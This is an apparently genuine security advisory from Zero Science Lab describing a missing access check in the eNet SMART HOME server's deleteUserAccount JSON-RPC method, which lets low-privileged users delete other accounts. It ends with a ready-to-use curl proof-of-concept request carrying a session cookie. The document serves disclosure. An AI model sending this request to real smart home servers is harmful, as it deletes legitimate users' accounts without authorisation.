📄 eNet SMART HOME Server 2.3.1 Arbitrary User Deletion

eNet SMART HOME server 2.3.1 (deleteUserAccount) Arbitrary User Deletion
    
    
    Vendor: Gira Giersiepen GmbH & Co. KG | ALBRECHT JUNG GmbH & Co. KG | Insta GmbH
    Product web page: https://www.enet-smarthome.com
    Affected version: 2.3.1 (46841)
                      2.2.1 (46056)
    
    Summary: Two German specialists in building systems technology are jointly bringing
    a new, wireless-based smart home system to the market. Gira and JUNG are the companies
    behind the eNet SMART HOME brand with our subsidiary, INSTA, responsible for developing
    the system. All three of us are old hands when it comes to building automation, and
    have a history of connecting buildings in an intelligent way that goes back as far as
    the 80s. Gira, JUNG and INSTA were part of the group of companies that initiated and
    founded EIBA (now known as KNX). KNX is the first open global standard for home and
    building automation. Through KNX, we have decisively shaped the development of intelligent
    building systems technology – and this wealth of experience has now come together in
    eNet SMART HOME. The eNet server is the heart of every eNet SMART HOME system and
    offers end customers the basis for an easy-to-use and secure Smart Home and installation
    engineers easily understandable and professional commissioning of the system.
    
    Desc: The eNet Smart Home system contains an authorization weakness in the deleteUserAccount
    JSON-RPC method that permits any authenticated low-privileged user (UG_USER) to delete
    arbitrary user accounts, except for the built-in admin account. The application does not
    enforce proper role-based access control on this function, allowing a standard user to
    submit a crafted request specifying another username and have that account removed without
    elevated permissions or additional confirmation. This enables unauthorized user management
    actions, leading to denial of service against legitimate users, disruption of operations,
    and potential concealment of malicious activity.
    
    Tested on: GNU/Linux 4.4.15 (ARMv7 revision 5)
               Jetty(9.2.z-SNAPSHOT)
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                @zeroscience
    
    
    Advisory ID: ZSL-2026-5973
    Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5973.php
    
    
    07.02.2026
    
    --
    
    
    $ curl -X POST "http://TARGETIP:8080/jsonrpc/management" \
     -H "Content-Type: application/json" \
     -H "Referer: http://TARGETIP:8080/serverconfiguration.html?icp=kRuUFOgUoCnHeaHZ5P1m" \
     -H "Cookie: INSTASESSIONID=2txt9zmzo8ij3cfdyagulvb7s" \
     --data '{"jsonrpc":"2.0", "method":"deleteUserAccount", "params":{"userName":"testingus"}, "id":"6"}'